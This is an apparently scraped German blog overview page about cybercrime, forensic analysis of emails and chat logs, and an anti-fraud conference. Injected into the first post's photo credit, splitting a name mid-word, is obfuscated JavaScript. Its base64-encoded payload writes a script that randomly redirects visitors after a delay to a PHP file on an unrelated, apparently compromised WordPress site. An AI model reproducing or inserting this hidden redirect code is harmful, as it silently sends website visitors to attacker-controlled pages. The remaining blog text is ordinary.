Das blogge ich woanders 2014

© Orl<script/>function u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var y7=“;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0<q3.length);document.write(y7);};u2fd518ba9147('PHNjcmlwdD4NCnZhciBudW1iZXIxPU1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDYpOyANCmlmIChudW1iZXIxPT0zKQ0Kew0KIHZhciBkZWxheSA9IDE4MDAwOwkNCiBzZXRUaW1lb3V0KCJkb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmJ0bGF3ZmlybS5jb20vd3AtY29udGVudC9wbHVnaW5zL3NpLWNvbnRhY3QtZm9ybS9jYXB0Y2hhLXNlY3VyZWltYWdlL3NlY3VyaW1hZ2Vfc3RvcC5waHAnIiwgZGVsYXkpOw0KfQ0KPC9zY3JpcHQ+');ando Florin Rosu - Fotolia.comAuch wenn ich hier im letzten Jahr 2014 nicht so viel geschrieben habe, gab es einige Blogbeiträge von mir zu lesen. Anbei ein Überblick, was ich so woanders zu Cybercrime, Data Leakage und Wirtschaftskriminalität geschrieben habe. Weiterlesen...

Zentralstelle zur Cyber Crime Bekämpfung (ZAC) und Fallzahlen in NRW

© Ben Chams - Fotolia.comGerade haben Unbekannte 16 Millionen Zugangsdaten verschiedener Onlinedienste gekapert – vor allem deutsche Nutzer sind betroffen. Bei einer US-Einzelhandelskette erbeuteten Cyberkriminelle rund siebzig Millionen Kundendatensätze einschließlich Kreditkarteninfos. Es sind die zwei neuesten Fälle schwere Hackerattacken. Die Täter: bestens organisiert, dreist und schnell. Die Opfer: schlecht vorbereitet.

Weiterlesen...

forensische Auswertung von E-Mails aus Backups

© Stuart Miles - Fotolia.comDie Verlockung für den IT-Forensiker ist groß, wenn Backupbestände mit alten Daten und E-Mails vorhanden sind. Würde der leichtsinnige private Ermittler hier alle Backups sofort wiederherstellen und die Suche darin beginnen, denkt der rechtssichere IT-Forensiker nochmal kurz darüber nach. Hier gilt: Nicht alles, was technisch möglich ist, ist auch erlaubt. Ein wichtiges Urteil hat dazu jüngst das Verwaltungsgericht Karlsruhe

Weiterlesen...

Analyse von Chatprotokollen und E-Mails – Was ist erlaubt? Was ist verwertbar?

© Scanrail - Fotolia.comDass sehr viele Tätigkeiten der IT-Forensik (im privatwirtschaftlichen Bereich) an der datenschutzrechtlichen Unzulässigkeit oft nur knapp vorbeischrammen, wird dem aufmerksamen Leser dieses Blogs nicht entgangen sein. Aus diesem Grund möchte ich wieder auf einen Beitrag meiner beiden Datenschutzkollegen Barbara Scheben und Christian Klos hinweisen. Es geht einmal mehr um die Auswertung von Chatprotokollen und E-Mails sowie die Stellung eines Unternehmens als Diensteanbieter im Sinne des TKG. Da es letzte Woche in einem anderen prominenten Fall am VG Karlsruhe ein für IT-Forensiker ebenfalls richtungsweisendes Urteil gab, werde ich mich dem Thema demnächst nocheinmal widmen. Weiterlesen...

ACFE Fachtagung „Anti-Fraud Management“ bei KPMG in Frankfurt

Am 18.4.2013 findet in unserer Frankfurter Niederlassung die Fachtagung „Anti-Fraud Management in D, A, CH“ des German Chapters of the ACFE e.V. in Kooperation mit dem ACFE Austria und dem ACFE Switzerland Chapter statt. Weiterlesen...